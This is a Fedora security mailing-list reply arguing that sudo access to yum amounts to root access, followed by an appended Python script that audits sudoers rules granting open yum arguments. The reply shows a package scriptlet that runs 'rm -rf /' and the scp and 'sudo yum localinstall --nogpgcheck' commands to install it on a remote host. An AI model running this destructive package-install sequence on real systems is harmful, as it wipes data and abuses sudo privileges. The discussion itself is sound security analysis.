On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta@xxxxxx> wrote:
> On Saturday 05 January 2008, Kevin Fenzi wrote:
> >
> > I find root ssh login handy for a number of reasons:
> [...]
> > - It's nice to be able to do for automated tasks (like say installing a
> > single new package on 20 machines without having to login and sudo on
> > each).
>
> "ssh -t $host sudo yum install $package" works for me...

What about (supposing I know the password of non-root user 'foo', and
assuming that 'foo' can sudo yum):

[hacker@tooeasy]$ rpm -q --scripts hacker_pkg.rpm
postinstall scriptlet (using /bin/sh):
rm -rf /
exit 0
[hacker@tooeasy]$ scp -p hackers_pkg.rpm foo@host:
[hacker@tooeasy]$ ssh -t foo@host sudo yum localinstall --nogpgcheck ./hackers_pkg.rpm

Am I wrong in assuming that yum is not necessarily a safe command to be
used with sudo? Or more exactly, that there is no point in blocking root
ssh logins if you're going to let a user that can login remotely use sudo
on yum?

Thanks.

--
Fedora-security-list mailing list
Fedora-security-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-security-list
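
Added example, not part of the original message: a defender-side audit of sudoers rules for the situation raised above, where a user's sudo grant on yum leaves the arguments (and so the package and its scriptlets) up to the caller. The sample sudoers text is constructed, the function name yum_findings is hypothetical, and aliases and escaped commas are not handled.

```python
import re

# Constructed sudoers sample (not from the thread); 'foo' mirrors the user in the message.
SAMPLE_SUDOERS = """\
Defaults    env_reset
foo     ALL=(root) /usr/bin/yum
bar     ALL=(root) NOPASSWD: /usr/bin/yum install *
baz     ALL=(root) /usr/bin/yum check-update, /usr/bin/yum -y update
ops     ALL=(root) /usr/bin/yum "", /sbin/service httpd restart
%wheel  ALL=(ALL) ALL
"""

TAG = re.compile(r"^(?:[A-Z_]+:\s*)+")      # NOPASSWD:, NOEXEC:, ...
RUNAS = re.compile(r"\([^)]*\)")            # (root), (ALL), (root, admin)

def yum_findings(text):
    """Return (who, command, reason) for rules that leave yum's arguments to the caller."""
    findings = []
    for line in text.replace("\\\n", " ").splitlines():   # join continuation lines
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        who = line.split()[0]
        if who.endswith("_Alias") or who.startswith("Defaults"):
            continue                         # aliases are not expanded here
        spec = RUNAS.sub("", line.split("=", 1)[1])
        for cmd in (TAG.sub("", c.strip()) for c in spec.split(",")):
            parts = cmd.split()
            if not parts:
                continue
            args = parts[1:]
            if parts[0] == "ALL":
                reason = "ALL includes yum with any arguments"
            elif parts[0].rsplit("/", 1)[-1] != "yum":
                continue
            elif not args:
                # sudoers: a command listed without arguments may be run with any
                reason = "no argument list: any yum arguments allowed"
            elif args == ['""']:
                continue                     # "" means yum with no arguments only
            elif any("*" in a or "?" in a for a in args):
                reason = "wildcard arguments: caller chooses what follows"
            elif "localinstall" in args or "--nogpgcheck" in args:
                reason = "local package file or signature check disabled"
            else:
                continue                     # fixed argument list
            findings.append((who, cmd, reason))
    return findings

if __name__ == "__main__":
    for who, cmd, reason in yum_findings(SAMPLE_SUDOERS):
        print(f"{who:8} {cmd:28} {reason}")
```

Rules with a fixed argument list (baz, ops) are not reported; they still depend on the configured repositories and gpgcheck settings, which this check does not inspect.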